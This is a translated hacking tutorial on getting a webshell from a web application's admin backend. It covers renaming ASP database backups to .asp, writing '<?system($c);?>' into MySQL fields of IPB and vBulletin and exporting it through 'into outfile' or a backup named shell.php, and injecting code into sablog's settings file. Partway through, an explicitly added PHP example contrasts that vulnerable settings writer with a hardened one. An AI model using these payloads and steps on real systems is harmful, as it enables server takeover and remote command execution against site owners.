1. ASP + Access/MSSQL programs
This mainly abuses the "backup database" or "restore database" function that the backend provides for the Access database. Variables such as the backup database path are not filtered, so a file with any suffix can be changed to .asp, which yields a webshell. The MSSQL version of the program reuses the Access code directly, so the same method still works against the SQL version. For detailed methods and analysis, refer to angel's article "Analysis of webshell obtained by Forum 7.0". As far as I know, many ASP program backends still have such vulnerabilities, and they are exploited in much the same way.
2. PHP + MySQL programs
①. Use the data query function in the backend
Some programs provide a MySQL query function in the backend, and we can use it to run select ... into outfile so that the query result is written out as a PHP file. Because all the data is stored in MySQL, we can insert our webshell code into MySQL through normal means, and the into outfile statement then exports the shell. Here we use the ipb forum for a demonstration:
Step 1: write our webshell code to the database
Find a field that can be written to, making sure the input is not filtered there. Here we use the backend to create a forum and put our shell code in the forum description: <?system($c);?>. Click OK to submit, and the shell is written to the database.
Step 2: Export webshell
Under "SQL management" -> "mysql toolbox", enter the statement in "run query":
select * from 123 forums into outfile 'd:\shell.php'
The name after "from" is the table where the shell code is located, and the outfile path is the absolute path to the web directory.
If the query succeeds on the host's MySQL, we get our webshell:
http://127.0.0.1/test/shell.php?c=dir
②. Use MySQL data backup
This combines the two cases above: some programs place no restriction on the file type when backing up the database, so the backup can be exported as a PHP file. We write the webshell code into the database as in ① and then export it through data backup. The familiar vbb forum can be used to obtain a webshell this way:
We set the user signature to <?system($c);?>, then back up the database in the backend, change "back up the database to file on the server" to shell.php, and submit to save the backup. We can then access our shell in the root directory of the forum. Because the exported file may be very large, we can instead use webshell code that generates a file.
Some ideas for going from the backend to a webshell: supplement
Author: superhei
Ideas:
Use the system settings in the web backend: if the settings are saved in a php/asp file, we can put webshell code into a setting so that it is written into the php/asp file that stores the settings.
Demo:
Take the program sablog: its basic settings are saved in admin\settings.php. Because the 10 variables submitted in the backend are not filtered, we can write arbitrary code to admin\settings.php.
Go to the backend -- "Basic settings" -- "blog name" (or other items) -- enter the code: sss "; phpinfo ();" ss -- submit.
In this way, we write phpinfo() to admin\settings.php. Requesting admin\settings.php then displays the PHP information as normal.
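For whoever maintains such a backend, the flaw in this demo is that a submitted value is pasted into PHP source between double quotes. The following is an added example, not sablog's code and not part of the original article; the function names and the settings array are assumptions. It contrasts that pattern with a writer that serializes values through var_export() and then checks that the generated file holds literals only.

```php
<?php
// Added example, not sablog's code. Function names and sample data are assumptions.
// Vulnerable pattern: the value lands inside a double-quoted PHP string literal,
// so a quote in the input ends the literal and the rest is parsed as code.
function render_settings_unsafe(array $settings): string
{
    $src = "<?php\n";
    foreach ($settings as $key => $value) {
        $src .= "\$$key = \"$value\";\n";
    }
    return $src;
}

// Hardened writer: allowlisted key names, scalar values only, and var_export()
// emits single-quoted literals with ' and \ escaped, so input stays data.
function render_settings_safe(array $settings): string
{
    $clean = [];
    foreach ($settings as $key => $value) {
        if (!is_string($key) || !preg_match('/^[a-z_][a-z0-9_]{0,31}$/i', $key)) {
            throw new InvalidArgumentException('bad setting name');
        }
        if (!is_scalar($value)) {
            throw new InvalidArgumentException("bad value for $key");
        }
        $clean[$key] = (string) $value;
    }
    return "<?php\nreturn " . var_export($clean, true) . ";\n";
}

// Defence in depth: a file produced by render_settings_safe() must contain no
// identifiers or variables at all, only literals inside "return array (...)".
function contains_code(string $src): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && in_array($tok[0], [T_STRING, T_VARIABLE, T_EVAL], true)) {
            return true;
        }
    }
    return false;
}

$input = ['blog_name' => 'sss "; phpinfo ();" ss']; // value quoted from the article
echo render_settings_unsafe($input);  // the call ends up outside the string literal
$safe = render_settings_safe($input);
echo $safe;                           // the whole value stays inside one literal
var_dump(contains_code($safe));
```

The application would then load the file with `$settings = require 'settings.php';`, and the settings file should not be writable by any other code path.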
Summary:
The above is a demonstration on a PHP system. It also applies to other systems such as ASP ones (for example power and cloud download). Be careful when writing the code: if the code is incorrect, the entire web system may be paralyzed.
Another route is to use an upload vulnerability :).